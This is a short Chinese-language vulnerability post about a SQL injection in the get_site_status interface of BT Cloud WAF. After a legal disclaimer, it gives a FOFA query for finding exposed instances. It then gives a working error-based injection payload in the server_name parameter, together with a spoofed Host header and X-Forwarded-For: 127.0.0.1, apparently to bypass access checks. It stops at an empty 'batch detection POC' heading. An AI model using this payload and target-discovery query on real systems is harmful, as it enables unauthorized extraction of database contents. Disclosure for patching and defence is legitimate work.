PART.01
免责声明

安全圈子我最菜(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

PART.02
漏洞描述

堡塔云 WAF 是广东堡塔安全技术有限公司的一款 WAF 产品。

堡塔云 WAF get_site_status 接口 server_name 参数存在 SQL注入漏洞,攻击者可利用此漏洞获取数据库敏感信息。

PART.03
fofa搜索语句
title=='404 - Website not exist!''宝塔'上面两个都可以  也可以自己找一找语法

图片

PART.04
影响版本

宝塔云WAF

PART.05
漏洞复现

SQL注入漏洞存在于 server_name参数处

burp抓包

url改为:

/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'

HOST改为:

127.0.0.251

加上:

X-Forwarded-For: 127.0.0.1

图片

PART.06
批量检测POC